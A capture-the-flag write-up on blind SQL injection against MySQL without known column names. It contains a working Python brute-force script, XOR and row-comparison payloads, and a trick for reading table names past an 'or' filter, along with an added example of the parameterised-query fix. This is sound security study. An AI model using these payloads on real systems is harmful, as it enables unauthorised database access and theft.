- Boolean-based blind injection
- Injection without column names
Testing
- id=1 ==> Nu1L
- id=2 ==> V&N
- id=2-1 ==> Nu1L
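The third probe is the tell: an endpoint that answers `id=2-1` with the `id=1` row is evaluating client input as SQL. The following is an added example, not part of the write-up, showing the concatenating query beside its parameterised fix on an in-memory SQLite table with constructed rows standing in for the challenge's `users` table (the MySQL-specific `^` trick is not reproduced here).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample rows mirroring the observed responses: id 1 -> Nu1L, id 2 -> V&N.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "Nu1L"), (2, "V&N")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str):
    # String concatenation: the client value becomes part of the SQL text,
    # so "2-1" is evaluated as arithmetic and matches id 1.
    row = conn.execute("SELECT name FROM users WHERE id = " + user_id).fetchone()
    return row[0] if row else None


def lookup_fixed(conn: sqlite3.Connection, user_id: str):
    # Bound parameter: the value is data, never SQL. "2-1" cannot be coerced
    # to an integer and matches nothing; "1" still finds the row.
    row = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None


def echoes_arithmetic(conn: sqlite3.Connection, lookup) -> bool:
    # The page's probe as a regression check: does id=2-1 return the id=1 row?
    base = lookup(conn, "1")
    return base is not None and lookup(conn, "2-1") == base


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", echoes_arithmetic(db, lookup_vulnerable))  # True
    print("fixed:     ", echoes_arithmetic(db, lookup_fixed))       # False
```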
Here is the script:
```python
# coding:utf-8
import requests
import time

url = 'http://14b858fa-e701-47da-a11a-304ef60eb42d.node3.buuoj.cn/'


def str_hex(s):
    # hex-encode a string, e.g. fl ==> 0x666c; MySQL reads the literal back as a string
    res = ''
    for i in s:
        res += hex(ord(i)).replace('0x', '')
    res = '0x' + res
    return res


res = ''
for i in range(1, 200):
    print(i)
    # binary search over printable ASCII for the i-th character
    left = 31
    right = 127
    mid = left + ((right - left) >> 1)
    while left < right:
        #payload = '1^(ascii(substr(database(),{},1))>{})'.format(i,mid)  # dump the database name
        #payload = '1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys),{},1))>{})'.format(i,mid)  # dump the table names
        #payload = '1^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})'.format(i,mid)  # guess that the column in f1ag_1s_h3r3_hhhhh is named flag
        key = str_hex(res + chr(mid))
        payload = "1 ^ ( (select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))".format(key)
        data = {'id': payload}
        r = requests.post(url=url, data=data)
        if r.status_code == 429:
            # rate limited: wait and retry the same candidate rather than reading the 429 body
            print('too fast')
            time.sleep(2)
            continue
        if 'Nu1L' in r.text:
            # candidate prefix <= flag prefix (1^0): the real character is mid or higher
            left = mid + 1
        else:
            # candidate prefix > flag prefix (1^1, error page): the real character is below mid
            right = mid
        mid = left + ((right - left) >> 1)
    if mid == 31 or mid == 127:
        # the search collapsed onto a boundary: no more characters
        break
    #res += chr(mid)  # dump the table names
    res += chr(mid - 1)  # dump the flag: the search ends one above the real character
    print(str(mid), res)
#give_grandpa_pa_pa_pa
#news,users,f1ag_1s_h3r3_hhhhh,users233333333333333
#flag{8ebdb3ac-1d0e-47f3-82d5-ef5b4d20fe70}
```
Because `or` is filtered, the information_schema database cannot be used (its name contains `or`), so sys.x$schema_flattened_keys is used to dump the table names instead.
There are two ways to get the flag.
First:
Directly guess that the column in f1ag_1s_h3r3_hhhhh is named flag.
Second:
Brute force it.
Key payload:
```sql
1 ^ ( (select 1,1) > (select * from f1ag_1s_h3r3_hhhhh))
```
The `1`s here probe the number of columns: add or remove `1`s until the row comparison is accepted, which reveals the column count.
```sql
1 ^ ( (select 1,'f') > (select * from f1ag_1s_h3r3_hhhhh))
```
How it works:
- Compare position by position: if the guessed character equals the current character of the flag, move on to the next position; whether the guess is too large or too small, keep iterating the current loop until the right character is found.
- When the guess is less than or equal to f, the expression is 1^0 and the page shows Nu1L; when it is greater than f (g and so on), the expression is 1^1 and the page returns Error Occured When Fetch Result.
- So the final mid must be decremented by one to obtain the correct character.
- The value is passed as hex here; MySQL automatically converts the hex literal to a string.
- MySQL string comparison is case-insensitive: the ASCII value of O (0x4f) is lower than that of f (0x66), yet the comparison reports O as greater than f.
References